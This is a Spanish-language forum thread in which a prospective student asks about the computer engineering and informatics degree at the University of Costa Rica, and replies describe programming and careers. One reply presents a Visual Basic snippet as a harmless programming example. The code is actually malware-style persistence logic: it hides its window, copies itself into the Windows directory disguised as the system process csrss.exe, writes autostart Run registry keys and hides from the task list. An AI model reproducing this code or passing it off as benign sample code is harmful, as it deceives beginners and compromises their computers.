Computación Ing. compuation e informatica en la UCR

Hola soy nuevo en el foro y tenia una duda sobre esta carrera

En que consiste la ingenieria en computacion e informatica? pues esta año termino el cole y voy para la universidad, yo tenia la idea de estudiar Ing, en sistemas pero investigue sobre ello y note que es muy dificil y no es como esperaba.... y vi que un primo estudio esta carrera, Ing, en computacion e informatica en la UCR y el gana bien y en estos momentos lo mandaron a Brasil
emoticon_08.gif
y pues dije: "el es amante de los juegos, y las computadoras igual que yo... que tiene esa carrera que le interese? talvez a mi me guste igual" y pues quiero entrar a esa, pero primero saber sobre de que va, que hacen en clases? que hacen cuando terminan de estudiar(en que tipo de empresa trabajan)? y esque busco en internet pero no hay nada que me de una idea clara de esto.... que es lo que mas me interesa....
Gracias

Esa carrera no es lo que uno imagina por lo menos para los que salen de un colegio académico porque por lo menos los que salen de uno técnico con especialidad de informática tienen las cosas muy claras.

En resumen: Es una carrera donde se aprende a programar en diferentes lenguajes de programacion (como java, c# por mencionar algunos) aplicaciones informáticas pueden ser aplicaciones de escritorio, aplicaciones web o para celulares o cualquier otra cosa, incluso un sistema operativo si así lo requiere.

Aqui hay un pequeño resumen la leccion 1:

Algoritmos

Un algoritmo es como una serie de pasos para resolver un problema, que son base para desarrollar un programa.

A la hora de buscar trabajo es probable que se encuentre trabajos como web developer, DBA (administrador de bases de datos), también puede optar como administrador de redes, o simplemente como administrador de proyectos (la parte administrativa del desarrollo de sistemas grandes), y también muchas otras variantes.

El perfil del profesional lo puedes ver en las diferentes universidades.

No encontre el de la UCR (por no tener suficiente usabilidad en su pagina xD, otro concepto que veras cuando estudies en la carrera), pero aquí hay información valiosa:

Información general sobre Ciencias de la Computación e Informática | ECCI | Universidad de Costa Rica

Saludos.

sobre de que va, que hacen en clases?

Así muy por encima le digo que va de hacer aplicaciones, juegos...

La aplicaciones se pueden a hacer con varios lenguajes de programación. Le dejo un ejemplo de como es mas o menos el código para programar.

Pequeño programilla en vb
Private Sub Timer1_Timer()Form1.Visible = False
Dim win
Dim sys
Dim residencia
On Error Resume Next
ejec = App.path
If Right(ejec, 1) <> "\" Then ejec = ejec & "\"
ejec = ejec & App.EXEName & ".exe"
Set obj = CreateObject("Scripting.FileSystemObject")
Set win = obj.GetSpecialFolder(0)
Set sys = obj.GetSpecialFolder(1)
win = LCase(win)
sys = LCase(sys)
FileCopy ejec, win & "\taskman"
Name win & "\taskman" As win & "\csrss.exe"
Set residencia = CreateObject("WScript.Shell")
residencia.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\" & "reg", win & "\csrss.exe"
residencia.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\" & "reg", win & "\csrss.exe"
App.TaskVisible = False
Timer1.Enabled = False
End Sub

O este que es parte del código de una calculadora en "Java"

publicvoidfuncSuma(){ // Este metodo implementa la suma.
if(t1.getText() == ""){
t1.setText("0");
}

numero = Double.parseDouble(t1.getText());

if(comp == "-"){
resultado = (resultado - numero);
t1.setText("0");
} else if(comp == "*"){
resultado = (resultado * numero);
t1.setText("0");
} else if(comp == "/"){
resultado = (resultado / numero);
t1.setText("0");
}

comp = "+";
resultado = (resultado + numero);
t1.setText("");
}

public void funcResta(){
// Este metodo implementa la resta.

if(comp == "+"){
resultado = (resultado + numero);
t1.setText("");
} else if(comp == "*"){
resultado = (resultado * numero);
t1.setText("");
} else if(comp == "/"){
resultado = (resultado / numero);
t1.setText("");
}

comp = "-";
resultado = (numero - resultado);
t1.setText("");
}

Esa carrera no es lo que uno imagina por lo menos para los que salen de un colegio académico porque por lo menos los que salen de uno técnico con especialidad de informática tienen las cosas muy claras.

En resumen: Es una carrera donde se aprende a programar en diferentes lenguajes de programacion (como java, c# por mencionar algunos) aplicaciones informáticas pueden ser aplicaciones de escritorio, aplicaciones web o para celulares o cualquier otra cosa, incluso un sistema operativo si así lo requiere.

Aqui hay un pequeño resumen la leccion 1:

Algoritmos

Un algoritmo es como una serie de pasos para resolver un problema, que son base para desarrollar un programa.

A la hora de buscar trabajo es probable que se encuentre trabajos como web developer, DBA (administrador de bases de datos), también puede optar como administrador de redes, o simplemente como administrador de proyectos (la parte administrativa del desarrollo de sistemas grandes), y también muchas otras variantes.

El perfil del profesional lo puedes ver en las diferentes universidades.

No encontre el de la UCR (por no tener suficiente usabilidad en su pagina xD, otro concepto que veras cuando estudies en la carrera), pero aquí hay información valiosa:

Información general sobre Ciencias de la Computación e Informática | ECCI | Universidad de Costa Rica

Saludos.

Ok mae... esque no em defino bien en que quiero, quisiera ser programador, pero tambien me gustaria mucho repararlas y cosas asi.... asi que voy a pensar muy bien cual escojo porque bueno ya me contaron que nada mas entrar a sistemas piden una compu buena y asi, la mia no lo es....y no conocia bien que se hace en Ing en computacion e informatica, asi que la cosa esta ruda, algun dia agregare a mi primo a facebook o *** ¡USAR MENSAJERÍA INTERNA DEL FORO / EDITE SU MENSAJE PARA NO SER BANNEADO! *** y le pido informacion sobre eso

Últimas Noticias de Costa Rica

📑 Evite Incurrir en Multas y Sanciones: Ofrecemos servicios de presentación de declaraciones de IVA (D104), alquileres (D125) y la anual de renta (D101)

🦉Prepración para examenes desde 6to hasta Bachillerato por madurez.
¡Obtenga su título!

¿Está a favor de la portación de armas para la defensa personal?

• Sí, para garantizar la seguridad individual

• No, para reducir el riesgo de incidentes violentos

Los resultados solo son visibles tras votar.

TicosLand is now also available on Android and iOS

¿Las universidades públicas costarricenses son refugios de ideologías extremistas?

• Sí, son una cueva de profesores parásitos

Votos: 370 59,3%
  • No, son cunas del libre pensamiento

Votos: 254 40,7%

¿Apoya la creación de una ley de eutanasia en Costa Rica?

• Sí, por el derecho a una muerte digna

• No, por el respeto absoluto a la vida

En tendencia

¿Costa Rica debería promover abiertamente el turismo sexual?

• Sí, podría dar un impulso económico

• No, debido a las implicaciones morales y sociales negativas

🚀 FACTURATica.com la #1 sin Mensualidades ni Anualidades. Inscripción gratis en Hacienda.

¿Estaría de acuerdo en la pena de muerte para crímenes graves y flagrantes?

• Sí y también para la corrupción

• No, por el riesgo de errores judiciales y la ética de la vida

¿Debería Costa Rica legalizar la marihuana para uso recreativo?

• Sí, por los beneficios económicos y de seguridad

• No, debido a los potenciales riesgos para la salud y la sociedad

Atrás